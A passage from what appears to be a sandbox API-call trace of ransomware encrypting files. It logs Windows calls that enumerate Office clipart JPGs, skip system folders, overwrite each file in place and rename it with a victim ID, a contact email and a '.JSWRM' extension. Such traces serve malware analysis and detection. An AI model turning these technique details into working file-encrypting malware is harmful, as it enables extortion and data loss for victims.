Flags=0x0, Size=0x90) returned 0x20ff90 [0089.526] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341344.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341344.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0089.526] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=11485) returned 1 [0089.526] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.526] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2cd0) returned 0x24d210 [0089.526] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x2cd0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x2cd0, lpOverlapped=0x0) returned 1 [0089.537] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.537] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x2cd0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x2cd0, lpOverlapped=0x0) returned 1 [0089.537] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0089.537] CloseHandle (hObject=0x314) returned 1 [0089.538] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0089.538] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0089.538] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0089.538] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0089.538] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0089.538] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0089.538] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0089.538] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0089.538] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0089.538] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0089.538] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d338 [0089.538] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0089.538] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d338 | out: hHeap=0x1e0000) returned 1 [0089.538] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0089.538] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341344.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341344.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341344.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341344.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0089.539] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0089.539] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0089.539] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0089.539] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf45328f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf45328f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf45328f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4c6d, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0341439.JPG", cAlternateFileName="")) returned 1 [0089.539] lstrcmpiW (lpString1="J0341439.JPG", lpString2=".") returned 1 [0089.539] lstrcmpiW (lpString1="J0341439.JPG", lpString2="..") returned 1 [0089.539] lstrcmpiW (lpString1="J0341439.JPG", lpString2="...") returned 1 [0089.539] lstrcmpiW (lpString1="J0341439.JPG", lpString2="windows") returned -1 [0089.539] lstrcmpiW (lpString1="J0341439.JPG", lpString2="recovery") returned -1 [0089.539] lstrcmpiW (lpString1="J0341439.JPG", lpString2="perflogs") returned -1 [0089.539] lstrcmpiW (lpString1="J0341439.JPG", lpString2="documents and settings") returned 1 [0089.539] lstrcmpiW (lpString1="J0341439.JPG", lpString2="$RECYCLE.BIN") returned 1 [0089.539] lstrcmpiW (lpString1="J0341439.JPG", lpString2="system volume information") returned -1 [0089.539] lstrcmpiW (lpString1="J0341439.JPG", lpString2="msocache") returned -1 [0089.539] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0089.539] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0341439.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.539] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0341439.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0341439.JPG", lpUsedDefaultChar=0x0) returned 12 [0089.539] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0089.539] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0089.539] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0341439.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.539] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0341439.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0341439.JPG", lpUsedDefaultChar=0x0) returned 12 [0089.539] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0089.539] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0089.539] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0089.539] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0089.539] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0089.539] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0089.539] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341439.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341439.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0089.540] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=19565) returned 1 [0089.540] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.540] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4c60) returned 0x24d210 [0089.540] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x4c60, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x4c60, lpOverlapped=0x0) returned 1 [0089.543] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.543] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x4c60, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x4c60, lpOverlapped=0x0) returned 1 [0089.543] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0089.543] CloseHandle (hObject=0x314) returned 1 [0089.543] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0089.543] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0089.543] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0089.543] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0089.543] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0089.543] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0089.543] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0089.543] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0089.543] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0089.543] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0089.543] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0089.543] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0089.543] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0089.543] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0089.543] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341439.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341439.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341439.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341439.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0089.544] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0089.544] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0089.544] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0089.544] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf42d018, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf42d018, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf45328f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4ad8, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0341447.JPG", cAlternateFileName="")) returned 1 [0089.544] lstrcmpiW (lpString1="J0341447.JPG", lpString2=".") returned 1 [0089.545] lstrcmpiW (lpString1="J0341447.JPG", lpString2="..") returned 1 [0089.545] lstrcmpiW (lpString1="J0341447.JPG", lpString2="...") returned 1 [0089.545] lstrcmpiW (lpString1="J0341447.JPG", lpString2="windows") returned -1 [0089.545] lstrcmpiW (lpString1="J0341447.JPG", lpString2="recovery") returned -1 [0089.545] lstrcmpiW (lpString1="J0341447.JPG", lpString2="perflogs") returned -1 [0089.545] lstrcmpiW (lpString1="J0341447.JPG", lpString2="documents and settings") returned 1 [0089.545] lstrcmpiW (lpString1="J0341447.JPG", lpString2="$RECYCLE.BIN") returned 1 [0089.545] lstrcmpiW (lpString1="J0341447.JPG", lpString2="system volume information") returned -1 [0089.545] lstrcmpiW (lpString1="J0341447.JPG", lpString2="msocache") returned -1 [0089.545] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0089.545] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0341447.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.545] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0341447.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0341447.JPG", lpUsedDefaultChar=0x0) returned 12 [0089.545] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0089.545] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0089.545] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0341447.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.545] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0341447.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0341447.JPG", lpUsedDefaultChar=0x0) returned 12 [0089.545] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0089.545] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0089.545] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0089.545] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0089.545] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0089.545] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0089.546] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341447.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341447.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0089.546] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=19160) returned 1 [0089.547] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.547] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4ad0) returned 0x24d210 [0089.547] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x4ad0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x4ad0, lpOverlapped=0x0) returned 1 [0089.550] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.550] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x4ad0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x4ad0, lpOverlapped=0x0) returned 1 [0089.550] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0089.550] CloseHandle (hObject=0x314) returned 1 [0089.550] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0089.550] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0089.550] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0089.550] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0089.550] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0089.550] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0089.550] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0089.550] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0089.550] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0089.550] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0089.550] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0089.550] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247a88 [0089.550] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0089.550] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0089.550] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341447.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341447.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341447.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341447.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0089.551] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247a88 | out: hHeap=0x1e0000) returned 1 [0089.551] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0089.551] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0089.551] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf45328f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf45328f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf4794eb, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x52c3, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0341448.JPG", cAlternateFileName="")) returned 1 [0089.551] lstrcmpiW (lpString1="J0341448.JPG", lpString2=".") returned 1 [0089.551] lstrcmpiW (lpString1="J0341448.JPG", lpString2="..") returned 1 [0089.551] lstrcmpiW (lpString1="J0341448.JPG", lpString2="...") returned 1 [0089.551] lstrcmpiW (lpString1="J0341448.JPG", lpString2="windows") returned -1 [0089.551] lstrcmpiW (lpString1="J0341448.JPG", lpString2="recovery") returned -1 [0089.551] lstrcmpiW (lpString1="J0341448.JPG", lpString2="perflogs") returned -1 [0089.551] lstrcmpiW (lpString1="J0341448.JPG", lpString2="documents and settings") returned 1 [0089.551] lstrcmpiW (lpString1="J0341448.JPG", lpString2="$RECYCLE.BIN") returned 1 [0089.551] lstrcmpiW (lpString1="J0341448.JPG", lpString2="system volume information") returned -1 [0089.551] lstrcmpiW (lpString1="J0341448.JPG", lpString2="msocache") returned -1 [0089.551] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0089.552] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0341448.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.552] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0341448.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0341448.JPG", lpUsedDefaultChar=0x0) returned 12 [0089.552] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0089.552] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0089.552] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0341448.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.552] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0341448.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0341448.JPG", lpUsedDefaultChar=0x0) returned 12 [0089.552] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0089.552] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0089.552] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0089.552] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0089.552] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0089.552] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0089.552] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0341448.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0341448.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0089.552] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=21187) returned 1 [0089.552] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.552] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x52c0) returned 0x24d210 [0089.552] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x52c0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x52c0, lpOverlapped=0x0) returned 1 [0089.555] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.555] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x52c0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x52c0, lpOverlapped=0x0) returned 1 [0089.555] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0089.555] CloseHandle (hObject=0x314) returned 1 [0089.556] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0089.556] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0089.556] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0089.556] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: 